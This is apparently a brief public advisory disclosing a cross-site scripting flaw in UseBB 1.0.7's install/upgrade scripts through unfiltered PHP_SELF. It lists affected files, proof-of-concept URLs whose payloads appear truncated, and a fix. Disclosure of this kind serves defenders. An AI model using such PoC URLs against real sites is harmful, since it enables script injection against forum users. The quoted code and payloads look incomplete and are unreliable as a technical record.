############################################################# # Script...............: UseBB version: 1.0.7 # # Script Site..........: http://www.usebb.net # # Vulnerability........: Cross Site Scripting (XSS) # # Acces................: Remote # # level................: Dangerous # # Author...............: S4mi # # Contact..............: s4mi[at]LinuxMail.org # ############################################################# The affected Files : ==================== /UseBB/install/upgrade-0-2-3.php /UseBB/install/upgrade-0-3.php /UseBB/install/upgrade-0-4.php vuln Code: line ~ 86 ===================== [code] return ''; [/code] The variables PHP_SELF is used without filtering PoC : ==================== http://127.0.0.1/UseBB/install/upgrade-0-2-3.php/"> http://127.0.0.1/UseBB/install/upgrade-0-3.php/"> http://127.0.0.1/UseBB/install/upgrade-0-4.php/"> Solution : ==================== filtre the PHP_SELF or you know what's the best lool : Delete the Install directory :D Shoutz : ==================== Simo64, DrackaNz, Iss4m, Coder212, HarDose, r0_0t, ddx39, E.chark, Nuck3r ....... & all Others